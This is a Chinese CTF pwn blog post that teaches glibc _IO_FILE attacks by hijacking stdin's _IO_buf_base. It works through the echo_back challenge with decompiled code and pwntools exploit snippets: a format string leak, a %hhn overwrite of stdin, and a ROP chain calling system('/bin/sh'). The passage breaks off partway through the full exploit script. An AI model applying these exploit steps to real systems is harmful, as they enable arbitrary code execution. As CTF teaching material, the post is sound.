<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <link rel="manifest" href="/images/manifest.json">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-corner-indicator.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ikoct.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="Pwn进阶技巧(大概?">
<meta property="og:type" content="article">
<meta property="og:title" content="IO FILE攻击">
<meta property="og:url" content="https://ikoct.com/2025/02/25/IO-FILE%E6%94%BB%E5%87%BB/">
<meta property="og:site_name" content="Ikoct的饮冰室">
<meta property="og:description" content="Pwn进阶技巧(大概?">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F02%2F25%2F20250225-170139.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F03%2F11%2F20250311-202809.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F03%2F11%2F20250311-203118.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F03%2F11%2F20250311-211259.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F03%2F11%2F20250311-212416.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F03%2F11%2F20250311-212012.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F03%2F11%2F20250311-213332.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F03%2F11%2F20250311-213537.png">
<meta property="article:published_time" content="2025-02-25T09:53:30.000Z">
<meta property="article:modified_time" content="2025-03-11T13:41:26.264Z">
<meta property="article:author" content="1K0CT B14s">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F02%2F25%2F20250225-170139.png">

<link rel="canonical" href="https://ikoct.com/2025/02/25/IO-FILE%E6%94%BB%E5%87%BB/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>IO FILE攻击 | Ikoct的饮冰室</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Ikoct的饮冰室</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">你愿意和我学一辈子二进制吗?</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ikoct.com/2025/02/25/IO-FILE%E6%94%BB%E5%87%BB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/myavatar.gif">
      <meta itemprop="name" content="1K0CT B14s">
      <meta itemprop="description" content="残りの人生、私にくれませんか？">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ikoct的饮冰室">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          IO FILE攻击
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2025-02-25 17:53:30" itemprop="dateCreated datePublished" datetime="2025-02-25T17:53:30+08:00">2025-02-25</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-03-11 21:41:26" itemprop="dateModified" datetime="2025-03-11T21:41:26+08:00">2025-03-11</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E4%BA%8C%E8%BF%9B%E5%88%B6/" itemprop="url" rel="index"><span itemprop="name">二进制</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E4%BA%8C%E8%BF%9B%E5%88%B6/Pwn/" itemprop="url" rel="index"><span itemprop="name">Pwn</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>15k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>13 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>Pwn进阶技巧(大概?</p>
<span id="more"></span>

<p><code>_IO_FILE</code>结构体:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00000000</span> <span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE</span> // <span class="title">sizeof</span>=</span><span class="number">0xD8</span></span><br><span class="line"><span class="number">00000000</span> &#123;</span><br><span class="line"><span class="number">00000000</span>     <span class="type">int</span> _flags;</span><br><span class="line"><span class="number">00000004</span>     <span class="comment">// padding byte</span></span><br><span class="line"><span class="number">00000005</span>     <span class="comment">// padding byte</span></span><br><span class="line"><span class="number">00000006</span>     <span class="comment">// padding byte</span></span><br><span class="line"><span class="number">00000007</span>     <span class="comment">// padding byte</span></span><br><span class="line"><span class="number">00000008</span>     <span class="type">char</span> *_IO_read_ptr;</span><br><span class="line"><span class="number">00000010</span>     <span class="type">char</span> *_IO_read_end;</span><br><span class="line"><span class="number">00000018</span>     <span class="type">char</span> *_IO_read_base;</span><br><span class="line"><span class="number">00000020</span>     <span class="type">char</span> *_IO_write_base;</span><br><span class="line"><span class="number">00000028</span>     <span class="type">char</span> *_IO_write_ptr;</span><br><span class="line"><span class="number">00000030</span>     <span class="type">char</span> *_IO_write_end;</span><br><span class="line"><span class="number">00000038</span>     <span class="type">char</span> *_IO_buf_base;</span><br><span class="line"><span class="number">00000040</span>     <span class="type">char</span> *_IO_buf_end;</span><br><span class="line"><span class="number">00000048</span>     <span class="type">char</span> *_IO_save_base;</span><br><span class="line"><span class="number">00000050</span>     <span class="type">char</span> *_IO_backup_base;</span><br><span class="line"><span class="number">00000058</span>     <span class="type">char</span> *_IO_save_end;</span><br><span class="line"><span class="number">00000060</span>     <span class="class"><span class="keyword">struct</span> _<span class="title">IO_marker</span> *_<span class="title">markers</span>;</span></span><br><span class="line"><span class="number">00000068</span>     <span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE</span> *_<span class="title">chain</span>;</span></span><br><span class="line"><span class="number">00000070</span>     <span class="type">int</span> _fileno;</span><br><span class="line"><span class="number">00000074</span>     <span class="type">int</span> _flags2;</span><br><span class="line"><span class="number">00000078</span>     <span class="type">__off_t</span> _old_offset;</span><br><span class="line"><span class="number">00000080</span>     <span class="type">unsigned</span> __int16 _cur_column;</span><br><span class="line"><span class="number">00000082</span>     <span class="type">signed</span> __int8 _vtable_offset;</span><br><span class="line"><span class="number">00000083</span>     <span class="type">char</span> _shortbuf[<span class="number">1</span>];</span><br><span class="line"><span class="number">00000084</span>     <span class="comment">// padding byte</span></span><br><span class="line"><span class="number">00000085</span>     <span class="comment">// padding byte</span></span><br><span class="line"><span class="number">00000086</span>     <span class="comment">// padding byte</span></span><br><span class="line"><span class="number">00000087</span>     <span class="comment">// padding byte</span></span><br><span class="line"><span class="number">00000088</span>     _IO_lock_t *_lock;</span><br><span class="line"><span class="number">00000090</span>     <span class="type">__off64_t</span> _offset;</span><br><span class="line"><span class="number">00000098</span>     <span class="type">void</span> *__pad1;</span><br><span class="line"><span class="number">000000</span>A0     <span class="type">void</span> *__pad2;</span><br><span class="line"><span class="number">000000</span>A8     <span class="type">void</span> *__pad3;</span><br><span class="line"><span class="number">000000B</span>0     <span class="type">void</span> *__pad4;</span><br><span class="line"><span class="number">000000B</span>8     <span class="type">size_t</span> __pad5;</span><br><span class="line"><span class="number">000000</span>C0     <span class="type">int</span> _mode;</span><br><span class="line"><span class="number">000000</span>C4     <span class="type">char</span> _unused2[<span class="number">20</span>];</span><br><span class="line"><span class="number">000000</span>D8 &#125;;</span><br></pre></td></tr></table></figure>

<p>很多高级的IO库函数(例如<code>printf()</code>, <code>scanf()</code>)底层实现都依赖这个结构体中的数据 </p>
<h2 id="劫持-IO-buf-base-控制scanf输入量"><a href="#劫持-IO-buf-base-控制scanf输入量" class="headerlink" title="劫持 _IO_buf_base 控制scanf输入量"></a>劫持 _IO_buf_base 控制scanf输入量</h2><p><code>_IO_buf_base</code>和<code>_IO_buf_end</code>分别指向当前缓冲区的开始和结束地址 在程序还没调用过高级IO函数时被初始化为NULL 而经过调用后底层的<code>_IO_file_xsgetn()</code>函数中经过<code>if (fp-&gt;_IO_buf_base == NULL)</code>判断不通过后会调用<code>_IO_doallocbuf</code>进行缓冲区的初始化</p>
<p><code>_IO_read_ptr</code>和<code>_IO_read_end</code>分别指向要从此读入数据到目标地址的缓冲区的地址和结束地址 当<code>_IO_read_end &gt; _IO_read_ptr</code>成立时意味着缓冲区中还有未复制到用户指定目标地址的数据 这时候进行读操作时就会将这些数据复制到目标地址然后返回 这就是有些程序在第一次输入一句话时换行在第二次输入起作用的原因</p>
<p>也就是说当我们能控制<code>stdin</code>的IO FILE时 就能指定向某处内存输入数据或从某处内存读入数据到目标地址 其中一个具体用途就是控制<code>scanf()</code>的输入长度 因为<code>scanf()</code>在格式化字符串为<code>%d</code>, <code>%c</code>, <code>%i</code>等时就会将<code>_IO_buf_base</code>指向<code>_shortbuf</code> 而<code>_IO_buf_end</code>会指向<code>_shortbuf + 1</code> 导致只有1字节的输入量 如果修改<code>_IO_buf_base</code>或<code>_IO_buf_end</code>就能获得更长的输入量</p>
<p><code>scanf()</code>在条件符合的情况下最后执行的等价于<code>read(0, _IO_buf_base, _IO_buf_end - _IO_buf_base)</code></p>
<h3 id="应用举例"><a href="#应用举例" class="headerlink" title="应用举例"></a>应用举例</h3><h4 id="攻防世界-echo-back"><a href="#攻防世界-echo-back" class="headerlink" title="[攻防世界] echo_back"></a>[攻防世界] echo_back</h4><p>主函数伪代码:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">main</span><span class="params">(<span class="type">int</span> a1, <span class="type">char</span> **a2, <span class="type">char</span> **a3)</span></span><br><span class="line">&#123;</span><br><span class="line">  __int64 result; <span class="comment">// rax</span></span><br><span class="line">  <span class="type">int</span> v4; <span class="comment">// [rsp+8h] [rbp-18h]</span></span><br><span class="line">  <span class="type">char</span> s[<span class="number">8</span>]; <span class="comment">// [rsp+10h] [rbp-10h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v6; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v6 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  sub_560615C00A10();</span><br><span class="line">  alarm(<span class="number">0x3C</span>u);</span><br><span class="line">  sub_560615C00A53();</span><br><span class="line">  v4 = <span class="number">0</span>;</span><br><span class="line">  <span class="built_in">memset</span>(s, <span class="number">0</span>, <span class="keyword">sizeof</span>(s));</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      result = menu();</span><br><span class="line">      <span class="keyword">if</span> ( (_DWORD)result != <span class="number">2</span> )</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      echo(s);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( (_DWORD)result == <span class="number">3</span> )</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">if</span> ( (_DWORD)result == <span class="number">1</span> &amp;&amp; !v4 )</span><br><span class="line">    &#123;</span><br><span class="line">      name(s);</span><br><span class="line">      v4 = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>name</code>中可以为<code>main</code>栈帧中的<code>char s[8]</code>赋值 最多也只能读7字节</p>
<p>其中<code>echo</code>有明显的格式化字符串漏洞 但是最多只能输入7字节的格式化字符串:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 __fastcall <span class="title function_">echo</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *a1)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> nbytes; <span class="comment">// [rsp+1Ch] [rbp-14h] BYREF</span></span><br><span class="line">  <span class="type">char</span> s[<span class="number">8</span>]; <span class="comment">// [rsp+20h] [rbp-10h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v4; <span class="comment">// [rsp+28h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v4 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">memset</span>(s, <span class="number">0</span>, <span class="keyword">sizeof</span>(s));</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;length:&quot;</span>);</span><br><span class="line">  _isoc99_scanf(<span class="string">&quot;%d&quot;</span>, &amp;nbytes);</span><br><span class="line">  getchar();</span><br><span class="line">  <span class="keyword">if</span> ( nbytes &gt; <span class="number">6</span> )</span><br><span class="line">    nbytes = <span class="number">7</span>;</span><br><span class="line">  read(<span class="number">0</span>, s, nbytes);</span><br><span class="line">  <span class="keyword">if</span> ( *a1 )</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%s say:&quot;</span>, a1);</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;anonymous say:&quot;</span>);</span><br><span class="line">  <span class="built_in">printf</span>(s);</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v4;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这些输入量足够泄露栈和libc地址:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">echo</span>(<span class="params">c</span>):</span><br><span class="line">    sla(<span class="string">b&#x27;choice&gt;&gt; &#x27;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;length:&#x27;</span>, <span class="string">b&#x27;7&#x27;</span>)</span><br><span class="line">    s(c)</span><br><span class="line"></span><br><span class="line">echo(<span class="string">b&#x27;%p&#x27;</span>)</span><br><span class="line">ru(<span class="string">b&#x27;0x&#x27;</span>)</span><br><span class="line">sp = <span class="built_in">int</span>(r(<span class="number">12</span>), <span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">echo(<span class="string">b&#x27;%19$p&#x27;</span>)</span><br><span class="line">ru(<span class="string">b&#x27;0x&#x27;</span>)</span><br><span class="line">base = <span class="built_in">int</span>(r(<span class="number">12</span>), <span class="number">16</span>) - <span class="number">0x20830</span></span><br></pre></td></tr></table></figure>

<p>但是要用来任意地址写还是太短了 所以把目光转向<code>scanf()</code> 通过劫持<code>stdin</code>来进行任意地址写 具体的思路就是在泄露出libc地址后将<code>_IO_2_1_stdin_._IO_buf_base</code>的地址赋值给<code>s</code> 然后通过格式化字符串漏洞有机会向栈上残留的任意地址写入1个字节的b’\x00’ 就用这个0来覆盖<code>_IO_2_1_stdin_._IO_buf_base</code>的第1个字节 此时它就会指向<code>stdin + 0x20</code>的<code>_IO_2_1_stdin_._IO_write_base</code>:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">base = <span class="built_in">int</span>(r(<span class="number">12</span>), <span class="number">16</span>) - <span class="number">0x20830</span></span><br><span class="line"><span class="comment"># stdin_buf_base = base + 0x3c4918 计算题目给出的libc中的地址 下面计算的是是自己测试用的libc</span></span><br><span class="line">stdin_buf_base = base + <span class="number">0x3c3918</span></span><br><span class="line"></span><br><span class="line">sla(<span class="string">b&#x27;choice&gt;&gt; &#x27;</span>, <span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">sa(<span class="string">b&#x27;name:&#x27;</span>, p64(stdin_buf_base))</span><br><span class="line">echo(<span class="string">b&#x27;%16$hhn&#x27;</span>)</span><br></pre></td></tr></table></figure>



<p><img src="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F02%2F25%2F20250225-170139.png" alt="image-20250225170120416"></p>
<p>这样一来<code> _IO_buf_end - _IO_buf_base</code>变成了一个较大的数 给了更多的输入量 更重要的是此时再进行输入就会向新的缓冲区<code>_IO_write_base</code>输入数据 即可以更改这个字段往下直到<code>_shortbuf + 1</code>的所有数据 此时再将<code>main</code>栈帧中返回地址的地址写入<code>_IO_buf_base</code> 将payload结尾的估计地址(可以大一点)写入<code>_IO_buf_end </code>即可控制<code>main</code>的返回地址:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">stdin_short_buf = stdin_buf_base + <span class="number">0x4b</span></span><br><span class="line">system = base + so.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">binsh  = base + <span class="built_in">next</span>(so.search(<span class="string">b&#x27;/bin/sh&#x27;</span>))</span><br><span class="line">poprdi = base + <span class="number">0x0000000000021102</span></span><br><span class="line">fk_buf_base = sp + <span class="number">0x26f8</span></span><br><span class="line">fk_buf_end = fk_buf_base + <span class="number">0x30</span></span><br><span class="line">payload  = flat([stdin_short_buf] * <span class="number">3</span> + [fk_buf_base, fk_buf_end])</span><br><span class="line">payload_ = flat([poprdi, binsh, system])</span><br><span class="line"></span><br><span class="line">sla(<span class="string">b&#x27;choice&gt;&gt; &#x27;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">sa(<span class="string">b&#x27;length:&#x27;</span>, payload)</span><br><span class="line">sl(<span class="string">b&#x27;&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>但是问题随之而来 每次读取用户输入的操作结束后<code>_IO_read_end</code>都会加上读取到的用户输入长度 此时起再遇到高级的输入函数就会直接将上次发送的payload复制到目标地址里然后直接返回而不接收用户输入 这时候就需要用<code>getchar()</code>来消耗缓冲区中的可读取量:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(payload) - <span class="number">1</span>): <span class="comment"># 本地这里是 - 3</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&#x27;count: <span class="subst">&#123;_&#125;</span>, payload: <span class="subst">&#123;<span class="built_in">len</span>(payload)&#125;</span>&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;choice&gt;&gt; &#x27;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;length:&#x27;</span>, <span class="string">b&#x27;&#x27;</span>)</span><br><span class="line">    sl(<span class="string">b&#x27;&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>完整exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;./echo_back&#x27;</span>)</span><br><span class="line"><span class="comment"># so = ELF(&#x27;./libc.so.6&#x27;)</span></span><br><span class="line">so = ELF(<span class="string">&#x27;/home/i/PC_File/libs/2.23-0ubuntu3_amd64/libc-2.23.so&#x27;</span>)</span><br><span class="line">p = remote(<span class="string">&#x27;localhost&#x27;</span>, <span class="number">20000</span>)</span><br><span class="line"><span class="comment"># p = remote(&#x27;61.147.171.105&#x27;, 57955)</span></span><br><span class="line">s       = <span class="keyword">lambda</span> data               :p.send(data)</span><br><span class="line">sa      = <span class="keyword">lambda</span> delim,data         :p.sendafter(delim, data)</span><br><span class="line">sl      = <span class="keyword">lambda</span> data               :p.sendline(data)</span><br><span class="line">sla     = <span class="keyword">lambda</span> delim,data         :p.sendlineafter(delim, data)</span><br><span class="line">r       = <span class="keyword">lambda</span> num=<span class="number">4096</span>           :p.recv(num)</span><br><span class="line">ru      = <span class="keyword">lambda</span> delims, drop=<span class="literal">True</span>  :p.recvuntil(delims, drop)</span><br><span class="line">itr     = <span class="keyword">lambda</span>                    :p.interactive()</span><br><span class="line">uu32    = <span class="keyword">lambda</span> data               :u32(data.ljust(<span class="number">4</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">uu64    = <span class="keyword">lambda</span> data               :u64(data.ljust(<span 